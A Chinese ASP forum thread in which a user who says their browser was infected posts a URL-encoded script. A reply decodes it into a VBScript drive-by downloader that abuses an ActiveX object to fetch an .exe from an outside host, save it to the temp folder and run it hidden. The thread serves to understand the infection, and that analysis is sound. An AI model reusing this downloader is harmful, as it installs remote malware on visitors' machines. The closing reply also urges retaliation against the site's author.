我中了网页病毒，这里是代码，有能看懂的吗 - ASP技术论坛

问题点数：0 回复次数：4

我中了网页病毒，这里是代码，有能看懂的吗

<SCRIPT>var Words="%3Chtml%3E%0D%0A %3Cscript language%3D%22VBScript%22%3E%0D%0A on error resume next%0D%0A dl %3D %22http%3A%2F%2Fwww%2Eac66%2Ecn%2F88%2Frpp%2Eexe%22%0D%0A Set df %3D document%2EcreateElement%28%22object%22%29%0D%0A df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A str%3D%22Microsoft%2EXMLHTTP%22%0D%0A Set x %3D df%2ECreateObject%28str%2C%22%22%29%0D%0A a1%3D%22Ado%22%0D%0A a2%3D%22db%2E%22%0D%0A a3%3D%22Str%22%0D%0A a4%3D%22eam%22%0D%0A str1%3Da1%26a2%26a3%26a4%0D%0A str5%3Dstr1%0D%0A set S %3D df%2Ecreateobject%28str5%2C%22%22%29%0D%0A S%2Etype %3D 1%0D%0A str6%3D%22GET%22%0D%0A x%2EOpen str6%2C dl%2C False%0D%0A x%2ESend%0D%0A fname1%3D%22g0ld%2Ecom%22%0D%0A set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0A set tmp %3D F%2EGetSpecialFolder%282%29 %0D%0A fname1%3D F%2EBuildPath%28tmp%2Cfname1%29%0D%0A S%2Eopen%0D%0A S%2Ewrite x%2EresponseBody%0D%0A S%2Esavetofile fname1%2C2%0D%0A S%2Eclose%0D%0A set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29%0D%0A Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A %3C%2Fscript%3E%0D%0A %3Chead%3E%0D%0A %3Ctitle%3EOh%2Cmy god%21 Goldsun%5Bat%5D84823714%3C%2Ftitle%3E%0D%0A %3C%2Fhead%3E%3Cbody%3E%0D%0A%09%3Ccenter%3EYou DO it%21%3C%2Fcenter%3E%0D%0A %3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))</SCRIPT>

搜索更多相关主题的帖子: 网页　 Set　代码　 resume　str　

第 2 楼

得分:0

..................

日出东方，唯我不败！做任何东西都是耐得住寂寞,任何一个行业要有十年以上的积累才能成为专家

第 3 楼

得分:0

%XX
这样的编码方式是URL编码
可以把
Words引用的那串字符串用
Server.HTMLEncode(Words)输出来一下，就看得懂什么了

个人ajax技术专题站： " target="_blank">http://www. 我不会闲你烦，只会闲你不够烦！

第 4 楼

得分:0

大体转换了一下，红色部分本来是一行的，为了阅读方便，我给拆开成了很多行。

[QUOTE]<SCRIPT>
var Words="<html>
<script language='VBScript'>
on error resume next
dl = 'http://www.ac66.cn/88/rpp.exe'
Set df = document.createElement('object')
df.setAttribute 'classid', 'clsid:BD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36'
str='Microsoft.XMLHTTP'
Set x = df.CreateObject(str,'')
a1='Ado'
a2='db.'
a3='Str'
a4='eam'
str1=a1%26a2%26a3%26a4
str5=str1
set S = df.createobject(str5,'')
S.type = 1
str6='GET'
x.Open str6, dl, False
x.Send
fname1='g0ld.com'
set F = df.createobject('Scripting.FileSystemObject','')
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject('Shell.Application','')
Q.ShellExecute fname1,'','','open',0
</script>
<head>
<title>Oh,my god! Goldsun[at]84823714</title>
</head><body>
%09<center>You DO it!</center>
</body></html>
";
document.write(unescape(Words))</SCRIPT>[/QUOTE]

第 5 楼

得分:0

好像最终是去这个网站的，我对shell不懂

http://www.g0ld.com/

刚才我打开了，好像有病毒，会突破XP SP2限制弹出窗口，然后引诱人安装一种软件，国外的，谁有能力给这个家伙点颜色看看。